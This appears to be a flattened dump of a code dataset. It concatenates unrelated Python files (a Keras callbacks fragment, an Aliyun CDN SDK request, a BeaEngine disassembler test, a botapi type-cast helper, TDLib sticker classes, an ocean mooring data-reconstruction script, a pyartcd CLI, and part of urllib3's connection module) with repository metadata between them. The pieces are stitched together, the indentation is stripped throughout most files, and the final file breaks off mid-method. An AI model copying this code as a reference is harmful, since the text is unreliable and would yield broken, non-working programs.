      elif isinstance(k, collections.Iterable) and not is_zero_dim_ndarray:  # note: the bare alias was removed in Python 3.10; use collections.abc.Iterable there
return '"[%s]"' % (', '.join(map(str, k)))
else:
return k
if self.keys is None:
self.keys = sorted(logs.keys())
if self.model.stop_training:
# We set NA so that csv parsers do not fail for this last epoch.
logs = dict([(k, logs[k]) if k in logs else (k, 'NA') for k in self.keys])
if not self.writer:
class CustomDialect(csv.excel):
delimiter = self.sep
fieldnames = ['epoch'] + self.keys
if six.PY2:
fieldnames = [unicode(x) for x in fieldnames]
self.writer = csv.DictWriter(
self.csv_file,
fieldnames=fieldnames,
dialect=CustomDialect)
if self.append_header:
self.writer.writeheader()
row_dict = collections.OrderedDict({'epoch': epoch})
row_dict.update((key, handle_value(logs[key])) for key in self.keys)
self.writer.writerow(row_dict)
self.csv_file.flush()
def on_train_end(self, logs=None):
self.csv_file.close()
self.writer = None
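  # Resulting file layout (illustrative): a header such as "epoch,loss,val_loss"
  # followed by one row per epoch, e.g. "0,0.68,0.70"; iterable values are
  # written as quoted lists by handle_value. With append=True an existing,
  # non-empty log keeps its header and new rows are appended after it.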
@keras_export('keras.callbacks.LambdaCallback')
class LambdaCallback(Callback):
r"""Callback for creating simple, custom callbacks on-the-fly.
This callback is constructed with anonymous functions that will be called
at the appropriate time. Note that the callbacks expects positional
arguments, as:
- `on_epoch_begin` and `on_epoch_end` expect two positional arguments:
`epoch`, `logs`
- `on_batch_begin` and `on_batch_end` expect two positional arguments:
`batch`, `logs`
- `on_train_begin` and `on_train_end` expect one positional argument:
`logs`
Arguments:
on_epoch_begin: called at the beginning of every epoch.
on_epoch_end: called at the end of every epoch.
on_batch_begin: called at the beginning of every batch.
on_batch_end: called at the end of every batch.
on_train_begin: called at the beginning of model training.
on_train_end: called at the end of model training.
Example:
```python
# Print the batch number at the beginning of every batch.
batch_print_callback = LambdaCallback(
on_batch_begin=lambda batch,logs: print(batch))
# Stream the epoch loss to a file in JSON format. The file content
# is not well-formed JSON but rather has a JSON object per line.
import json
json_log = open('loss_log.json', mode='wt', buffering=1)
json_logging_callback = LambdaCallback(
on_epoch_end=lambda epoch, logs: json_log.write(
json.dumps({'epoch': epoch, 'loss': logs['loss']}) + '\n'),
on_train_end=lambda logs: json_log.close()
)
# Terminate some processes after having finished model training.
processes = ...
cleanup_callback = LambdaCallback(
on_train_end=lambda logs: [
p.terminate() for p in processes if p.is_alive()])
model.fit(...,
callbacks=[batch_print_callback,
json_logging_callback,
cleanup_callback])
```
"""
def __init__(self,
on_epoch_begin=None,
on_epoch_end=None,
on_batch_begin=None,
on_batch_end=None,
on_train_begin=None,
on_train_end=None,
**kwargs):
super(LambdaCallback, self).__init__()
self.__dict__.update(kwargs)
if on_epoch_begin is not None:
self.on_epoch_begin = on_epoch_begin
else:
self.on_epoch_begin = lambda epoch, logs: None
if on_epoch_end is not None:
self.on_epoch_end = on_epoch_end
else:
self.on_epoch_end = lambda epoch, logs: None
if on_batch_begin is not None:
self.on_batch_begin = on_batch_begin
else:
self.on_batch_begin = lambda batch, logs: None
if on_batch_end is not None:
self.on_batch_end = on_batch_end
else:
self.on_batch_end = lambda batch, logs: None
if on_train_begin is not None:
self.on_train_begin = on_train_begin
else:
self.on_train_begin = lambda logs: None
if on_train_end is not None:
self.on_train_end = on_train_end
else:
self.on_train_end = lambda logs: None
| [
"[email protected]"
] | |
e8f99e195a00a7eb686066deabd7198bdbd95ded | 0db97db08743783019efe022190f409d22ff95bd | /aliyun/api/rest/Cdn20141111DescribeCdnMonitorDataRequest.py | 589fb0bb77c88eb908d460a95e93610af5c76c7d | [
"Apache-2.0"
] | permissive | snowyxx/aliyun-python-demo | 8052e2a165f1b869affe632dda484d6ca203bd9b | ed40887ddff440b85b77f9b2a1fcda11cca55c8b | refs/heads/master | 2021-01-10T03:37:31.657793 | 2016-01-21T02:03:14 | 2016-01-21T02:03:14 | 49,921,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | '''
Created by auto_sdk on 2014.11.27
'''
from aliyun.api.base import RestApi
class Cdn20141111DescribeCdnMonitorDataRequest(RestApi):
def __init__(self,domain='cdn.aliyuncs.com',port=80):
RestApi.__init__(self,domain, port)
self.DomainName = None
self.EndTime = None
self.StartTime = None
def getapiname(self):
return 'cdn.aliyuncs.com.DescribeCdnMonitorData.2014-11-11'
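# Usage sketch (hypothetical values; the request plumbing comes from the
# RestApi base class, whose exact response method is assumed here):
#   req = Cdn20141111DescribeCdnMonitorDataRequest()
#   req.DomainName = 'example.com'
#   req.StartTime = '2014-11-20T00:00:00Z'
#   req.EndTime = '2014-11-27T00:00:00Z'
#   data = req.getResponse()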
| [
"[email protected]"
] | |
0f787c236ec1a8d885a4ef087fc082373227c8bc | 7f523c407d45d116860eff67f079e807f2b53339 | /src/third_party/beaengine/tests/0fc0.py | 0ac3b3878d9ad1a76c66fa1cc72d3a95f77ed24d | [
"LGPL-3.0-only",
"LGPL-2.0-or-later",
"MIT"
] | permissive | 0vercl0k/rp | a352c96bfe3715eb9ce8c5942831123e65289dac | b24e7f58a594aaf0ce3771745bf06862f6ecc074 | refs/heads/master | 2023-08-30T08:03:14.842828 | 2023-08-09T00:41:00 | 2023-08-09T00:41:00 | 3,554,173 | 1,557 | 239 | MIT | 2023-08-09T00:41:02 | 2012-02-26T19:26:33 | C++ | UTF-8 | Python | false | false | 2,280 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : [email protected]
from headers.BeaEnginePython import *
from nose.tools import *
class TestSuite:
def test(self):
# 0F c0 /r
# XADD r/m8, r8
Buffer = bytes.fromhex('0fc09011223344')
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
assert_equal(myDisasm.repr(), 'xadd byte ptr [rax+44332211h], dl')
assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE)
assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE)
# REX + 0F C0 /r
# XADD r/m8*, r8*
Buffer = bytes.fromhex('410fc09011223344')
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE)
assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE)
assert_equal(myDisasm.repr(), 'xadd byte ptr [r8+44332211h], dl')
# if LOCK and destination is not memory
Buffer = bytes.fromhex('f00fc0c011223344')
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
assert_equal(myDisasm.repr(), 'lock xadd al, al')
assert_equal(myDisasm.infos.Reserved_.ERROR_OPCODE, UD_)
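        # For contrast (not an original test case): the same LOCK prefix with
        # a memory destination, f0 0f c0 90 11 22 33 44, is legal and would be
        # expected to decode as 'lock xadd byte ptr [rax+44332211h], dl'
        # without the UD_ flag being set.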
| [
"[email protected]"
] | |
99987cf070bb316131b7d0ea14e3388a616f9a15 | 20be441085d9a9ae41dcf8e4dd5f416bcd3f22da | /botapi/type_cast.py | ad3483bde31f98a71ed76a913e083021fa977960 | [
"Apache-2.0"
] | permissive | santarovich/botapi | 928aaf48c44167b6893c51df738b9dc50873073a | dfb5161be08d0c045d70e023842144c4a18e012c | refs/heads/master | 2023-03-16T10:51:00.997084 | 2020-12-22T09:33:44 | 2020-12-22T09:33:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,052 | py | from datetime import datetime
from typing import Any
from .exceptions import TypeCastException
from .serialize import SerializableModel
from .types import TypedList, DateTime
def type_cast(func):
def wrapper(var_name: str, value: Any, *args, **kwargs):
if value is None:
return None
return func(var_name, value, *args, **kwargs)
return wrapper
class TypeCast:
@staticmethod
@type_cast
def cast(var_name: str, value: Any, var_type: Any = None, *args, **kwargs) -> Any:
"""
        Casts the value to var_type: SerializableModel subclasses are built from
        dicts, datetime subclasses from ISO strings, and matching values pass through
:param var_name: name of the attribute (used to raise errors)
:param value: value to cast
:param var_type: desired type
:return: casted value
"""
if var_type is None or isinstance(value, var_type):
return value
elif issubclass(var_type, SerializableModel) and isinstance(value, dict):
return var_type(**value)
elif issubclass(var_type, datetime) and type(value) == str:
return datetime.fromisoformat(value)
else:
raise TypeCastException(var_name, value, var_type)
@staticmethod
@type_cast
def datetime_cast(var_name, value, date_format: str = None, *args, **kwargs):
"""Returns DateTime casted from value
:param var_name: name of the attribute (used to raise errors)
:param value: str or datetime object
:param date_format: str with date format
:return: DateTime
"""
if type(value) == str:
if date_format is None:
result = DateTime.fromisoformat(value)
else:
result = DateTime.strptime(value, date_format)
elif type(value) == DateTime:
result = value
elif isinstance(value, datetime):
result = DateTime(
value.year,
value.month,
value.day,
value.hour,
value.minute,
value.second,
value.microsecond,
value.tzinfo
)
else:
raise TypeCastException(var_name, value, DateTime)
result.set_format(date_format=date_format)
return result
@staticmethod
@type_cast
def typed_list_cast(var_name, value, item_type=None, *args, **kwargs) -> TypedList:
"""Returns TypedList with type casted items
:param var_name: name of the attribute (used to raise errors)
:param value: iterable to cast
:param item_type: type of EVERY item
:return: TypedList
"""
if item_type is None:
return TypedList(value, None)
elif issubclass(item_type, SerializableModel):
return TypedList([
TypeCast.cast(var_name, item, item_type) for item in value
], item_type)
else:
return TypedList(value, item_type)
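# Usage sketch (hypothetical model class; TypedList/DateTime come from .types):
#   class User(SerializableModel):
#       ...
#   TypeCast.cast('user', {'id': 1}, User)                # dict -> User
#   TypeCast.datetime_cast('ts', '2020-12-22T09:33:44')   # ISO str -> DateTime
#   TypeCast.typed_list_cast('users', [{'id': 1}], User)  # -> TypedList of User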
| [
"[email protected]"
] | |
f7503c9a867b753e4c09c2fade37efbef3ea46d8 | 9c73eccb0f27ee98452864e6388802e1c0a9e51c | /py_tdlib/constructors/stickers.py | 4e1794bd2471db1a883cd9ab46fffe75f0da5e8d | [
"MIT"
] | permissive | Tempah28/python-tdlib | 32a684cba6f5b8fcd5673d01a06f926304d29c5b | 925781f2ef9e386dab437334048c798fa9cb945f | refs/heads/master | 2020-03-31T00:16:06.943269 | 2018-10-05T14:16:12 | 2018-10-05T14:16:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,549 | py | from ..factory import Method, Type
class stickers(Type):
    # Represents a list of stickers @stickers List of stickers
stickers = None # type: "vector<sticker>"
class getStickers(Method):
    # Returns stickers from the installed sticker sets that correspond to a
    # given emoji. If the emoji is not empty, favorite and recently used
    # stickers may also be returned @emoji String representation of emoji.
    # If empty, returns all known installed stickers @limit Maximum number
    # of stickers to be returned
emoji = None # type: "string"
limit = None # type: "int32"
class searchStickers(Method):
    # Searches for stickers from public sticker sets that correspond to a
    # given emoji @emoji String representation of emoji; must be non-empty
    # @limit Maximum number of stickers to be returned
emoji = None # type: "string"
limit = None # type: "int32"
class getRecentStickers(Method):
    # Returns a list of recently used stickers @is_attached Pass true to
    # return stickers and masks that were recently attached to photos or
    # video files; pass false to return recently sent stickers
is_attached = None # type: "Bool"
class addRecentSticker(Method):
    # Manually adds a new sticker to the list of recently used
    # stickers. The new sticker is added to the top of
    # the list. If the sticker was already in the list,
    # it is removed from the list first. Only stickers belonging
    # to a sticker set can be added to this list
is_attached = None # type: "Bool"
sticker = None # type: "InputFile"
class getFavoriteStickers(Method):
    # Returns favorite stickers
pass
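# Usage sketch (hypothetical; serialization and sending are handled elsewhere
# in this package by the Method machinery):
#   req = searchStickers()
#   req.emoji = '\U0001F600'
#   req.limit = 10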
| [
"andrew@localhost"
] | andrew@localhost |
159c3758b380920b7b9c253c437fa4ad4939b8f9 | e8e4bb89c6ce57c038de445091ddebc1c1b6eb26 | /DataProcessing_1418merged/CF1_merged_reconstruction.py | 207351cab222fb8c1799a14ab3f481dc095780f2 | [] | no_license | ilebras/OSNAP | dc7fba846f866ec64edab35a278d2ce6c86e5f97 | a5b22026351d2eb8dc4c89e2949be97122936d23 | refs/heads/master | 2021-05-12T16:46:18.955345 | 2020-09-08T23:04:23 | 2020-09-08T23:04:23 | 117,025,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,880 | py | from firstfuncs_1618 import *
dat16=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_2016recovery_dailymerged.nc')
dat16_recon=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_recon_2016recovery_dailymerged.nc')
dat18=xr.open_dataset(datadir+'OSNAP2018recovery/mcat_nc/CF1_2018recovery_dailymerged.nc')
def plot_overview(dat1,dat2):
f,[ax1,ax2,ax3]=subplots(3,1,figsize=(12,15),sharex=True)
ax1.plot(dat1.TIME,dat1.PRES)
ax1.plot(dat2.TIME,dat2.PRES)
ax1.invert_yaxis()
ax1.set_ylabel('pressure [db]')
ax2.plot(dat1.TIME,dat1.PTMP)
ax2.plot(dat2.TIME,dat2.PTMP)
ax2.set_ylabel('pot. temperature [$^\circ$C]')
ax3.plot(dat1.TIME,dat1.PSAL)
ax3.plot(dat2.TIME,dat2.PSAL)
ax3.set_ylabel('practical salinity []')
plot_overview(dat16_recon,dat18)
savefig(figdir+'merging_overview/CF1_overview_16recon_w18.png')
def TSplot(dat1,dat2):
figure(figsize=(9,8))
plot(dat1.PSAL,dat1.PTMP,'o',alpha=0.3)
plot(dat2.PSAL,dat2.PTMP,'o',alpha=0.3)
xlabel('practical salinity []')
ylabel('pot. temperature [$^\circ$C]')
TSplot(dat16_recon,dat18)
savefig(figdir+'merging_overview/CF1_TS_16recon_w18.png')
#############################################################################
############ The first deployment reconstruction does not look bad,
####### Going to leave as is and try something similar for the second deployment
#############################################################################
# I actually only have to reconstruct the 50dbar data.
def plot_diff_manyways(axx,thediff,colch,labch):
axx.plot(dat18.TIME,thediff,label='',alpha=0.5,color=colch)
axx.plot(dat18.resample(TIME='1M').mean(dim='TIME').TIME,thediff.resample(TIME='1M').mean(dim='TIME'),'o-',color=colch,linewidth=3,label=labch)
axx.axhline(mean(thediff),color=colch)
#############################################################################
############ Reconstruct using both instruments, see how well they agree
##### Use same method as first deployment: constant t offset, monthly s offset
#############################################################################
mtime=(dat18).resample(TIME='1M').mean(dim='TIME').TIME
sal_mdiff={}
sal_mdiff['from100']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100)).resample(TIME='1M').mean(dim='TIME')
sal_mdiff['from200']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200)).resample(TIME='1M').mean(dim='TIME')
sal_mdiff_fill_100=linspace(sal_mdiff['from100'][8],sal_mdiff['from100'][0],5)
sal_mdiff_fill_200=linspace(sal_mdiff['from200'][8],sal_mdiff['from200'][0],5)
sal_mdiff_int={}
sal_mdiff_int['from100']=hstack((sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:2]))
sal_mdiff_int['from200']=hstack((sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:2]))
# Plot the difference between 50db instrument temp and sal with the two other instruments.
def plot_saltmp_diff():
f,[ax1,ax2]=subplots(2,1,figsize=(12,10),sharex=True)
plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100),'C0','50m-100m')
ax1.plot(mtime,sal_mdiff_int['from100'],'o-',color='C0')
plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200),'C1','50m-200m')
ax1.plot(mtime,sal_mdiff_int['from200'],'o-',color='C1')
plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=100)-dat18.PSAL.sel(DEPTH=200),'C2','100m-200m')
ax1.axhline(0,color='k')
ax1.legend()
ax1.set_ylabel('salinity difference')
plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100),'C0','50m-100m')
plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200),'C1','50m-200m')
plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=100)-dat18.PTMP.sel(DEPTH=200),'C2','100m-200m')
ax2.axhline(0,color='k')
ax2.set_ylabel('temperature difference')
plot_saltmp_diff()
savefig(figdir+'merging_overview/CF1_saltmpdiff.png')
ptmp_r50={}
ptmp_r50['from100']=dat18.PTMP.sel(DEPTH=100)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100))
ptmp_r50['from200']=dat18.PTMP.sel(DEPTH=200)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200))
def toTimestamp(d):
return calendar.timegm(d.timetuple())
def to_datetime_andordinal(date):
"""
    Converts a numpy datetime64 object to a proleptic Gregorian ordinal
    Input:
    date - a np.datetime64 object
    Output:
    an integer ordinal (from datetime.toordinal), not a datetime object
"""
timestamp = ((date - np.datetime64('1970-01-01T00:00:00'))
/ np.timedelta64(1, 's'))
dtimeobj=datetime.datetime.utcfromtimestamp(timestamp)
return datetime.datetime.toordinal(dtimeobj)
time_month=[to_datetime_andordinal(ddd) for ddd in mtime.values]
time_all=[to_datetime_andordinal(ddd) for ddd in dat18.TIME.values]
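# The ordinal conversion above is there so scipy's interp1d gets a numeric
# x-axis: the monthly salinity offsets (defined at mtime) are interpolated
# onto the full daily grid (time_all) before being added to the 100m/200m records.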
f100=interp1d(time_month,sal_mdiff_int['from100'],bounds_error=False)
f200=interp1d(time_month,sal_mdiff_int['from200'],bounds_error=False)
sal_mdiff_fulltime={}
sal_mdiff_fulltime['from100']=f100(time_all)
sal_mdiff_fulltime['from200']=f200(time_all)
psal_r50={}
psal_r50['from100']=dat18.PSAL.sel(DEPTH=100)+sal_mdiff_fulltime['from100']
psal_r50['from200']=dat18.PSAL.sel(DEPTH=200)+sal_mdiff_fulltime['from200']
def comp_from100200():
f,[ax1,ax2]=subplots(2,1,figsize=(12,10))
ptmp_r50['from100'].plot(ax=ax1,label='from 100m')
ptmp_r50['from200'].plot(ax=ax1,label='from 200m')
dat18.PTMP.sel(DEPTH=50).plot(ax=ax1,label='directly measured')
ax1.legend()
ax1.set_title('')
psal_r50['from100'].plot(ax=ax2,label='from 100m')
psal_r50['from200'].plot(ax=ax2,label='from 200m')
dat18.PSAL.sel(DEPTH=50).plot(ax=ax2,label='directly measured')
ax2.set_title('')
comp_from100200()
###############################################################################
##### Save a reconstructed product which keeps the recorded 50m data
#### And adds the 100m reconstruction beyond that
#### This is simply because the 100m record is present, closer and noisier
#### It wouldn't make sense for the 50m instrument to have less variability
################################################################################
dat18_recon=dat18.copy()
dat18_recon['PSAL'].sel(DEPTH=50)[isnan(dat18['PSAL'].sel(DEPTH=50))]=psal_r50['from100'][isnan(dat18['PSAL'].sel(DEPTH=50))].values
dat18_recon['PTMP'].sel(DEPTH=50)[isnan(dat18['PTMP'].sel(DEPTH=50))]=ptmp_r50['from100'][isnan(dat18['PTMP'].sel(DEPTH=50))].values
dat18_recon['PRES'].sel(DEPTH=50)[isnan(dat18['PRES'].sel(DEPTH=50))]=mean(dat18['PRES'].sel(DEPTH=50))
plot(dat18_recon['PRES']);
plot_overview(dat16_recon,dat18_recon)
savefig(figdir+'merging_overview/CF1_overview_1618recon.png')
dat18_recon.to_netcdf(datadir+'OSNAP2018recovery/mcat_nc/CF1_mcat_recon_2018recovery_daily.nc','w',format='netCDF4')
| [
"[email protected]"
] | |
0564a1a72dcfd96a4e5f97d467c399d260cf2044 | 6ba8a0ebb55fee0406da9e4c6784def6391cf61b | /pyartcd/pyartcd/cli.py | 62569db660eb11953ff60867489214cead41a104 | [
"Apache-2.0"
] | permissive | gabemontero/aos-cd-jobs | a354d680250bf306a90a24ec5023cf203658df59 | 0208570f5bf14d6f9672da84b0edb6cffaaded92 | refs/heads/master | 2021-09-28T04:57:13.789002 | 2021-09-21T09:18:05 | 2021-09-21T09:18:05 | 96,802,806 | 0 | 0 | null | 2017-07-10T17:17:20 | 2017-07-10T17:17:20 | null | UTF-8 | Python | false | false | 2,047 | py | import asyncio
from functools import update_wrapper
import logging
from pathlib import Path
from typing import Optional
import click
from pyartcd.runtime import Runtime
pass_runtime = click.make_pass_decorator(Runtime)
def click_coroutine(f):
""" A wrapper to allow to use asyncio with click.
https://github.com/pallets/click/issues/85
"""
f = asyncio.coroutine(f)
def wrapper(*args, **kwargs):
loop = asyncio.get_event_loop()
return loop.run_until_complete(f(*args, **kwargs))
return update_wrapper(wrapper, f)
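# Usage sketch (hypothetical command, not part of this module):
#   @cli.command()
#   @pass_runtime
#   @click_coroutine
#   async def ping(runtime: Runtime):
#       await asyncio.sleep(0)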
# ============================================================================
# GLOBAL OPTIONS: parameters for all commands
# ============================================================================
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.option("--config", "-c", metavar='PATH',
help="Configuration file ('~/.config/artcd.toml' by default)")
@click.option("--working-dir", "-C", metavar='PATH', default=None,
help="Existing directory in which file operations should be performed (current directory by default)")
@click.option("--dry-run", is_flag=True,
help="don't actually execute the pipeline; just print what would be done")
@click.option("--verbosity", "-v", count=True,
help="[MULTIPLE] increase output verbosity")
@click.pass_context
def cli(ctx: click.Context, config: Optional[str], working_dir: Optional[str], dry_run: bool, verbosity: int):
config_filename = config or Path("~/.config/artcd.toml").expanduser()
working_dir = working_dir or Path.cwd()
# configure logging
if not verbosity:
logging.basicConfig(level=logging.WARNING)
elif verbosity == 1:
logging.basicConfig(level=logging.INFO)
elif verbosity >= 2:
logging.basicConfig(level=logging.DEBUG)
else:
raise ValueError(f"Invalid verbosity {verbosity}")
ctx.obj = Runtime.from_config_file(config_filename, working_dir=Path(working_dir), dry_run=dry_run)
| [
"[email protected]"
] | |
5e03d1a71d8a7262ee7ec1c4f55eb8fa0a2af5da | b48ca98425b9510d16623277a0761a33c00d028d | /SeatReservation-Version3.0/SeatReservation-master/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/_vendor/requests/packages/urllib3/connection.py | 496d7048b6cdceee53feae1715a631d048b1b441 | [] | no_license | billgoo/WHULibSeatReservation | f74a01db19f51a2034772d932c59afd9f63c7753 | 5423ef7df253739ccf279365c1dec1ebfe7f2c4f | refs/heads/master | 2020-04-02T07:18:33.174744 | 2018-12-23T15:26:15 | 2018-12-23T15:26:15 | 154,190,237 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,923 | py |
import datetime
import logging
import os
import sys
import socket
from socket import error as SocketError, timeout as SocketTimeout
import warnings
from .packages import six
try: # Python 3
from http.client import HTTPConnection as _HTTPConnection
from http.client import HTTPException # noqa: unused in this module
except ImportError:
    from httplib import HTTPConnection as _HTTPConnection  # Python 2
    from httplib import HTTPException  # noqa: unused in this module
try: # Compiled with SSL?
import ssl
BaseSSLError = ssl.SSLError
except (ImportError, AttributeError): # Platform-specific: No SSL.
ssl = None
class BaseSSLError(BaseException):
pass
try: # Python 3:
# Not a no-op, we're adding this to the namespace so it can be imported.
ConnectionError = ConnectionError
except NameError: # Python 2:
class ConnectionError(Exception):
pass
from .exceptions import (
NewConnectionError,
ConnectTimeoutError,
SubjectAltNameWarning,
SystemTimeWarning,
)
from .packages.ssl_match_hostname import match_hostname, CertificateError
from .util.ssl_ import (
resolve_cert_reqs,
resolve_ssl_version,
ssl_wrap_socket,
assert_fingerprint,
)
from .util import connection
from ._collections import HTTPHeaderDict
log = logging.getLogger(__name__)
port_by_scheme = {
'http': 80,
'https': 443,
}
RECENT_DATE = datetime.date(2014, 1, 1)
class DummyConnection(object):
"""Used to detect a failed ConnectionCls import."""
pass
class HTTPConnection(_HTTPConnection, object):
"""
Based on httplib.HTTPConnection but provides an extra constructor
backwards-compatibility layer between older and newer Pythons.
Additional keyword parameters are used to configure attributes of the connection.
Accepted parameters include:
- ``strict``: See the documentation on :class:`urllib3.connectionpool.HTTPConnectionPool`
- ``source_address``: Set the source address for the current connection.
.. note:: This is ignored for Python 2.6. It is only applied for 2.7 and 3.x
- ``socket_options``: Set specific options on the underlying socket. If not specified, then
defaults are loaded from ``HTTPConnection.default_socket_options`` which includes disabling
Nagle's algorithm (sets TCP_NODELAY to 1) unless the connection is behind a proxy.
For example, if you wish to enable TCP Keep Alive in addition to the defaults,
you might pass::
HTTPConnection.default_socket_options + [
(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),
]
Or you may want to disable the defaults by passing an empty list (e.g., ``[]``).
"""
default_port = port_by_scheme['http']
#: Disable Nagle's algorithm by default.
#: ``[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]``
default_socket_options = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]
#: Whether this connection verifies the host's certificate.
is_verified = False
def __init__(self, *args, **kw):
if six.PY3: # Python 3
kw.pop('strict', None)
# Pre-set source_address in case we have an older Python like 2.6.
self.source_address = kw.get('source_address')
if sys.version_info < (2, 7): # Python 2.6
# _HTTPConnection on Python 2.6 will balk at this keyword arg, but
# not newer versions. We can still use it when creating a
# connection though, so we pop it *after* we have saved it as
# self.source_address.
kw.pop('source_address', None)
#: The socket options provided by the user. If no options are
#: provided, we use the default options.
self.socket_options = kw.pop('socket_options', self.default_socket_options)
# Superclass also sets self.source_address in Python 2.7+.
_HTTPConnection.__init__(self, *args, **kw)
def _new_conn(self):
""" Establish a socket connection and set nodelay settings on it.
:return: New socket connection.
"""
extra_kw = {}
if self.source_address:
extra_kw['source_address'] = self.source_address
if self.socket_options:
extra_kw['socket_options'] = self.socket_options
try:
conn = connection.create_connection(
(self.host, self.port), self.timeout, **extra_kw)
except SocketTimeout as e:
raise ConnectTimeoutError(
self, "Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout))
except SocketError as e:
raise NewConnectionError(
self, "Failed to establish a new connection: %s" % e)
return conn
def _prepare_conn(self, conn):
self.sock = conn
# the _tunnel_host attribute was added in python 2.6.3 (via
# http://hg.python.org/cpython/rev/0f57b30a152f) so pythons 2.6(0-2) do
# not have them.
if getattr(self, '_tunnel_host', None):
# TODO: Fix tunnel so it doesn't depend on self.sock state.
self._tunnel()
# Mark this connection as not reusable
self.auto_open = 0
def connect(self):
conn = self._new_conn()
self._prepare_conn(conn)
def request_chunked(self, method, url, body=None, headers=None):
"""
Alternative to the common request method, which sends the
body with chunked encoding and not as one block
"""
headers = HTTPHeaderDict(headers if headers is not None else {})
skip_accept_encoding = 'accept-encoding' in headers
self.putrequest(method, url, skip_accept_encoding=skip_accept_encoding)
for header, value in list(headers.items()):
self.putheader(header, value)
if 'transfer-encoding' not in headers:
self.putheader('Transfer-Encoding', 'chunked')
self.endheaders()
if body is not None:
stringish_types = six.string_types + (six.binary_type,)
if isinstance(body, stringish_types):
body = (body,)
for chunk in body:
if not chunk:
continue
if not isinstance(chunk, six.binary_type):
chunk = chunk.encode('utf8')
len_str = hex(len(chunk))[2:]
self.send(len_str.encode('utf-8'))
self.send(b'\r\n')
self.send(chunk)
self.send(b'\r\n')
# After the if clause, to always have a closed body
self.send(b'0\r\n\r\n')
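    # Usage sketch (illustrative, not part of upstream urllib3): streaming an
    # iterable body with chunked framing --
    #   conn = HTTPConnection('example.com', 80)
    #   conn.request_chunked('POST', '/upload', body=(b'part1', b'part2'))
    #   resp = conn.getresponse()
    # Each chunk goes out as "<hex length>\r\n<chunk>\r\n", closed by "0\r\n\r\n".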
class HTTPSConnection(HTTPConnection):
default_port = port_by_scheme['https']
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, **kw):
HTTPConnection.__init__(self, host, port, strict=strict,
timeout=timeout, **kw)
self.key_file = key_file
self.cert_file = cert_file
# Required property for Google AppEngine 1.9.0 which otherwise causes
# HTTPS requests to go out as HTTP. (See Issue #356)
self._protocol = 'https'
def connect(self):
conn = self._new_conn()
self._prepare_conn(conn)
self.sock = ssl.wrap_socket(conn, self.key_file, self.cert_file)
class VerifiedHTTPSConnection(HTTPSConnection):
"""
Based on httplib.HTTPSConnection but wraps the socket with
SSL certification.
"""
cert_reqs = None
ca_certs = None
ca_cert_dir = None
ssl_version = None
assert_fingerprint = None
def set_cert(self, key_file=None, cert_file=None,
cert_reqs=None, ca_certs=None,
assert_hostname=None, assert_fingerprint=None,
ca_cert_dir=None):
if (ca_certs or ca_cert_dir) and cert_reqs is None:
cert_reqs = 'CERT_REQUIRED'
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
self.ca_certs = ca_certs and os.path.expanduser(ca_certs)
self.ca_cert_dir = ca_cert_dir and os.path.expanduser(ca_cert_dir)
def connect(self):
# Add certificate verification
conn = self._new_conn()
resolved_cert_reqs = resolve_cert_reqs(self.cert_reqs)
resolved_ssl_version = resolve_ssl_version(self.ssl_version)
hostname = self.host
if getattr(self, '_tunnel_host', None):
# _tunnel_host was added in Python 2.6.3
# (See: http://hg.python.org/cpython/rev/0f57b30a152f)
